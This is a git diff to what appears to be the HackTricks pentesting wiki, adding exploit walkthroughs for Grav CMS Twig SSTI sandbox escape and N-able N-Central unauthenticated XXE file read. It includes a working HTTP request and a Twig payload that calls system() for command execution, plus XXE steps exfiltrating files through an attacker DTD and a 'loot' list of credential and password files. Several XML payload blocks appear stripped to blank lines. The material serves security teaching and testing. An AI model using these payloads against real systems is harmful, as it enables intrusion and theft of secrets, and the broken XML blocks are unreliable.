diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index fdf253b1bef..9ac5c0d0b19 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -375,6 +375,7 @@
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
- [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
+ - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
index 878d498c40e..8251e907770 100644
--- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
+++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
@@ -81,3 +81,4 @@ adb shell ime help
- **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
- **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI).
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index 30f1c30a9da..a4a21ec10b0 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -549,6 +549,30 @@ $output = $twig > render (
- In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
+#### Grav CMS evaluate_twig sandbox escape (CVE-2025-66294 + CVE-2025-66301)
+
+Grav CMS versions prior to 1.8.0-beta.27 sanitize Twig by running cleanDangerousTwig before evaluate_twig, but the regex fails to strip nested calls. By abusing CVE-2025-66301 an authenticated but low-privileged user can still reach /admin/pages/{page} and edit the form "process" section, storing Twig that will later execute with sandbox restrictions disabled.
+
+1. **Add a form that re-evaluates user input.** The page editor accepts JSON inside data[_json][header][form]. Submitting the snippet below wires the form field "name" into evaluate_twig, so whatever the victim submits later becomes a Twig expression:
+
+```http
+POST /admin/pages/contact/:add HTTP/1.1
+Host: grav.local
+Content-Type: application/x-www-form-urlencoded
+
+_task=save&data[_json][header][form]={"name":"abuse","fields":{"name":{"type":"text","label":"Name"}},"process":[{"message":"{{ evaluate_twig(form.value('name')) }}"}]}
+```
+
+2. **Abuse undefined-function callbacks to reach PHP.** When the attacker or another user submits the public form at /contact, the value stored in data[name] hits evaluate_twig. The payload below registers system() as the handler for undefined Twig functions, disables the sandbox flag, and calls the command string:
+
+```twig
+{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}
+{% set _ = grav.config.set('system.twig.undefined_functions', false) %}
+{{ grav.twig.twig.getFunction('bash -c id') }}
+```
+
+3. **Deliver platform-specific shells.** The Metasploit module multi/http/grav_twig_ssti_sandbox_bypass_rce automatically swaps the payload for cmd/unix/* or cmd/windows/* stagers and can compress or base64-encode longer commands to fit inside the Twig expression.
+
### Plates (PHP)
Plates is a templating engine native to PHP, drawing inspiration from Twig. However, unlike Twig, which introduces a new syntax, Plates leverages native PHP code in templates, making it intuitive for PHP developers.
@@ -1155,5 +1179,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
- [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
- [0xdf – HTB: Editor (XWiki SolrSearch Groovy RCE → Netdata ndsudo privesc)](https://0xdf.gitlab.io/2025/12/06/htb-editor.html)
- [XWiki advisory – `SolrSearch` RSS Groovy RCE (GHSA-rr6p-3pfg-562j / CVE-2025-24893)](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j)
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+- [Metasploit Module – multi/http/grav_twig_ssti_sandbox_bypass_rce.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb)
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index 9a0e6e5b500..056a3a48d7d 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -28,6 +28,9 @@ In every Web Pentest, there are **several hidden and obvious places that might b
> Most of the web applications will **allow users to input some data that will be processed later.**\
> Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply.
+> [!NOTE]
+> Keep an eye on privileged workflows (installation wizards, XML/SOAP "hello" calls, or CMS page builders). If they create sessions before enforcing ACLs you can often chain them with attacks such as [XXE - XEE - XML External Entity](xxe-xee-xml-external-entity.md) or [SSTI (Server Side Template Injection)](ssti-server-side-template-injection/index.html) to reach file disclosure or RCE even when the dangerous endpoint was meant to be post-authentication.
+
### **Reflected Values**
If the introduced data may somehow be reflected in the response, the page might be vulnerable to several issues.
@@ -211,4 +214,8 @@ Modern applications extend into browsers, wallets, and automation pipelines—ke
- [ ] [**Browser Extension Pentesting**](browser-extension-pentesting-methodology/)
- [ ] [**wfuzz Web Fuzzing**](web-tool-wfuzz.md)
+## References
+
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+
{{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md
index 730221dfbb7..ba5294b0228 100644
--- a/src/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/src/pentesting-web/xxe-xee-xml-external-entity.md
@@ -769,6 +769,48 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-in-php/](https://swarm.ptsecurity.com/impossible-xxe-in-php/)
+### Chaining unauthenticated session bypass with SOAP XXE (N-able N-Central)
+
+N-able N-Central (2025.4.0.9) exposes SOAP endpoints that can be abused in tandem: CVE-2025-9316 lets you mint a session without credentials and CVE-2025-11700 lets that session import attacker-supplied XML. The result is an unauthenticated arbitrary file read that leaks the contents of N-Central's own configuration and backup artifacts.
+
+1. **Forge a session without credentials.** The sessionHello method on /dms/services/ServerUI accepts arbitrary appliance IDs and returns a <sessionID> even for unauthenticated clients. Brute-force the applianceId range (e.g., 1–30) until the server returns 200 plus a cookie:
+
+```xml
+
+
+
+ 7
+
+
+
+```
+
+2. **Stage a malicious log entry.** Reuse the hijacked session with applianceLogSubmit to write a base64-encoded service-template file under /opt/nable/webapps/ROOT/applianceLog/network_check_log_<ID>.log (the path is controllable via LOG_PATH). The payload is just XML that points to your DTD server:
+
+```xml
+
+ 1234567
+ NETWORK_CHECK_LOG
+ PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBF...
+
+```
+
+3. **Trigger the unsafe import.** Call importServiceTemplateFromFile on /dms/services/ServerUI and point filePath to the log you just wrote. When the server parses the file it will fetch your DTD over HTTP (self-signed HTTPS will fail with PKIX errors).
+
+4. **Error-based DTD exfiltration.** Serve a DTD that resolves a local file and injects the bytes into an error message by referencing a non-existent path. The contents show up inside the SOAP fault that bubbles back to the attacker:
+
+```xml
+
+">
+%boom; %error;
+```
+
+**Operational notes**
+
+- Interesting loot includes /opt/nable/var/ncsai/etc/ncbackup.conf, /var/opt/n-central/tmp/ncbackup/ncbackup.bin (PostgreSQL dumps), /opt/nable/etc/keystore.bcfks, /opt/nable/etc/masterPassword, and the usual /etc/passwd/shadow pairs.
+- Because the file read happens inside a SOAP fault you can script the extraction by parsing the <detail><string> element for the leaked bytes.
+- Set the DTD server to HTTP (DTD_PROTO=http) unless you can present a certificate the Java stack trusts.
+
## Tools
@@ -916,5 +958,7 @@ References for this vector are listed at the end of the page.
- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core XXE/SSRF + Path Traversal)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
- [Xerox FreeFlow Core Security Guide (architecture/ports)](https://securitydocs.business.xerox.com/wp-content/uploads/2025/03/Security-Guide-Information-Assurance-Disclosure-Xerox-FreeFlow-Core-8.0.pdf)
- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
+- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
+- [Metasploit Module – scanner/http/nable_ncentral_auth_bypass_xxe.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe.rb)
{{#include ../banners/hacktricks-training.md}}